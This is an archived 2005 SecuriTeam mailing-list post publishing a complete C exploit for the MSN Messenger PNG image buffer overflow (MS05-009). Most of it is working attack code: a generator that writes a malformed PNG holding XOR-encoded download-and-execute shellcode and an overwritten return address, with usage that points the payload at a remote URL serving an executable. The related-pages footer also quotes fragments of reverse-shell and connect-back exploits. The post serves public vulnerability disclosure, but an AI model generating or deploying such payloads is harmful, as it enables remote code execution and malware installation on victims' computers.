[EXPL] MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
From: SecuriTeam (support_at_securiteam.com)
Date: 02/13/05
- Previous message: SecuriTeam: "[EXPL] ELOG Remote Shell Exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 13 Feb 2005 12:06:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
------------------------------------------------------------------------
SUMMARY
Presented here is an exploit code that generates a .PNF file that exploits
a vulnerability in the handling of .PNG files in Microsoft Windows. For
more information regarding the vulnerability see:
<http://www.securiteam.com/windowsntfocus/5PP012KEUO.html> Vulnerability
in PNG Processing Allows Remote Code Execution (MS05-009)
DETAILS
/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ??2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca at icqmail
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90
char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";
FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name[i]=Name[i]^xor;
return Name;
}
void main(int argc, char *argv[])
{
if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download
Shellcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies
(www.coresecurity.com)\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ??2002-2005 AtmacaSoft Inc. All Rights
Reserved.\n");
printf("Web: http://www.atmacasoft.com\n");
printf("E-Mail: atmaca@icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit <OutputPath> <Url>\n");
printf("\tExample:exploit vuln.png
http://www.atmacasoft.com/exp/msg.exe\n");
return;
}
web = argv[2];
if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);
weblength=(short int)0xff22;
pointer=strstr(shellcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newshellcode = malloc((sizeof(shellcode)+strlen(web)+1)); //Note
by Andrew Hunter (andiroohunter at msn)
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"\x1d");
//shell code
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);
/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);
for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof[i],di);
printf("Vulnarable png file %s has been generated!\n",argv[1]);
fclose(di);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:atmaca@icqmail.com> ATmaCA.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] ELOG Remote Shell Exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Vulnerability in MSN Messenger Could Lead to Remote Code Execution (MS05-022)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A remote code execution vulnerability
exists in MSN Messenger that could ... An attacker would first need to entice you
to add them to your ... (Securiteam) - [NEWS] Ventrilo Denial of Service
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling
within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char
*data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
(Securiteam) - [UNIX] Bochs HOME Environment Variable Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Currently, Bochs can be
compiled to emulate a 386, 486, ... A vulnerability in Bochs allows a malicious user to
execute arbitrary ... main(int argc, char *argv){ ... (Securiteam) - [EXPL] Windows Lsasrv.dll Remote Universal Exploit (MS04-011)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char reverseshell[]
= ... int num; ... len = recv(sockfd, recvbuf, 1600, 0); ... (Securiteam) - [EXPL] NetDDE MS04-031 Exploit Code
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... in NetDDE Could Allow Remote Code
Execution, a vulnerability in ... NetDDE allows a remote attacker to cause the NetDDE
service to execute ... unsigned char connectbacksc[] = ... (Securiteam)
